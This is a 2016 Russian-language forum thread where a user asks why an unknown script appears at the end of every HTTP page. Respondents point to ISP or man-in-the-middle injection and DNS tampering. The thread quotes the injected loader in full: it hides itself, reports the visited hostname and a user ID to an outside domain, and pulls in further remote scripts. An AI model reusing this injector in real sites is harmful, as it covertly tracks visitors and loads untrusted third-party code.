[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Не пойму откуда эта ссылка
Страницы: 1, 2
Astin
Приветствую Всех!

Заметил такую фигню, когда открываешь исходный код сайта в браузере
внизу появляется код с ссылкой на скрипт перед закрывающим тегом
body. На моих сайтах этих ссылок нет.
Просматриваю любой другой сайт тоже стоит ссылка.
Не пойму, может что Хром добавляет автоматом сам

Вот такая вот штука появляется
<script src="http://msmdzbsyrw.org/app/code/code.php?appid=ins00-7132-1461413501764-45377954-f951-4dcb-9811-60ff98d9fae0&h=0&m=normal" id="ubar-loader">
</script>

Может кто знает что это за фигня
redreem
провайдер спамит smile.gif
Astin
Цитата (redreem @ 28.04.2016 - 18:29)
провайдер спамит smile.gif

Ну так с этим что нибудь надо делать или не обращать внимание.

redreem
на хабре куча статей по этому поводу.
Astin
Цитата (redreem @ 28.04.2016 - 18:50)
на хабре куча статей по этому поводу.

Ну так скажи тогда что конкретно искать,

какую тему?
redreem
ну вот например https://habrahabr.ru/post/262631/
другие темы по тегам там уж посмотри.
Astin
Цитата
ну вот например https://habrahabr.ru/post/262631/
другие темы по тегам там уж посмотри.


redreem Спасибо за ссылку, очень интересно. Я вот кстати пользуюсь
билайн, но хочу сменить его.

А вообще в ссылке на скрипт нет даже намека на билайн

Вот сам скрипт
void function(){if(window.self!==window.top)return;var pid='ins00',uid='45377954-f951-4dcb-9811-60ff98d9fae0',osid='7132',ts=1461413501764,h=0;var extadActive = (Date.now() - ts > 7200000) ? 1 : 0;
inject('//msmdzbsyrw.org/app/noext/main.php?pid=' + pid + '&eid=2&uid=' + uid + '&host=' + location.hostname + '&active=' + extadActive + '&extad_init=' + (window.EXTADinit ? 1 : 0)+'&h='+h);
location.hostname === 'www.youtube.com' && inject('https://www.u-bar.org/js/download.js');

removeSelf();

function removeSelf() {
var scr=document.getElementById('ubar-loader')||document.getElementById('videoplugin-loader');
scr&&tryToRemove(scr);
}

function inject(src){
var scr=document.createElement('script');
scr.src=src;
scr.onload=scr.onerror=function(){setTimeout(function(){tryToRemove(scr)},0)};
document.body.appendChild(scr);
}

function tryToRemove(node){try{node.parentNode.removeChild(node)}catch(ex){}}
}();


Вот эта строчка кода
inject('https://www.u-bar.org/js/download.js');


Вроде как ведет на загрузку приложения

Само приложение u-bar.org позволяет отключать всю рекламу в браузере.

Мне кажется что это не билайн, а сам гугл, а может и билайн.

Вот просмотрел сайт через Оперу и тоже есть в сайтах эта ссылка на скрипт

Как от нее избавиться не знаю?

Нашел сервис u-bar.org, перешел на него и он выдает окно
для загрузки приложения

Вот скрин http://itmages.ru/image/view/4207989/eb66151c

_




Миша
В общем смирись или поменяй провайдера.

Сделать с этим ты ничего не сможешь, потому что данные прилетают именно от провайдера и обойти это можно только сменив его.

Ну или использовать ПО, которое будет блокировать подобное, но стороннему ПО я не доверяю.

_____________
Принимаю заказы, писать в ЛС
Ron
Цитата (Медведь @ 29.04.2016 - 08:16)
обойти это можно только сменив его.

Нет, это неправда. Можно обойти с помощью любого туннеля.
killer8080
Astin
проверь настройки DNS, возможно тебя завирусили.
Попробуй ручками настроить на 8.8.8.8
Guest
Цитата
проверь настройки DNS, возможно тебя завирусили.
Попробуй ручками настроить на 8.8.8.8

killer8080 попробывал поменять DNS на компе, но при повторном подключении
все встает на прежнее место.

Может я что не так делаю....

Вроде ничего такого левого не качал с нета, плюс стоит ативирус NOD32.
Он конкретно все ненужное и нужное блокирует.

Миша
Цитата (Ron @ 29.04.2016 - 09:08)
Цитата (Медведь @ 29.04.2016 - 08:16)
обойти это можно только сменив его.

Нет, это неправда. Можно обойти с помощью любого туннеля.

Ты имеешь ввиду отправлять все запросы одному серверу, а он будет дёргать сайты, которые ты ему скажешь? Но это подходит только для сёрфинга.
Цитата
но стороннему ПО я не доверяю.

Иначе поднимать свой сервер, а стоит ли игра свеч ?)

_____________
Принимаю заказы, писать в ЛС
killer8080
Цитата (Guest @ 29.04.2016 - 10:09)
killer8080 попробывал поменять DNS на компе, но при повторном подключении
все встает на прежнее место.

Может я что не так делаю....

ну ты же можешь в настройках tcp/ip прописать DNS жёстко, другое дело, что неизвестно как реализована MITM, может публичные ДНСы спуфятся. По https код не внедряется? https вообще работает, не ругается на сертификаты?
Astin
Но вот если перейти по ссылки из скрипта https://www.u-bar.org

То пишет
Цитата
Ваше подключение не защищено

Злоумышленники могут пытаться похитить ваши данные с сайта www.u-bar.org (например, пароли, сообщения или номера банковских карт).


А если перейти на нормальный сайт с https то все нормально, но этого скрипта нет.

Переходишь на сайт с протоколом http появляется скрипт при просмотре
кода страницы
killer8080
Цитата (Astin @ 29.04.2016 - 10:52)
Но вот если перейти по ссылки из скрипта https://www.u-bar.org

То пишет

у них сертификат просрочен
Цитата (Astin @ 29.04.2016 - 10:52)
А если перейти на нормальный сайт с https то все нормально, но этого скрипта нет.

значит атака идёт только на не защищённые соединения, так что там с ДНС-ами? Есть подмена?
Быстрый ответ:

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.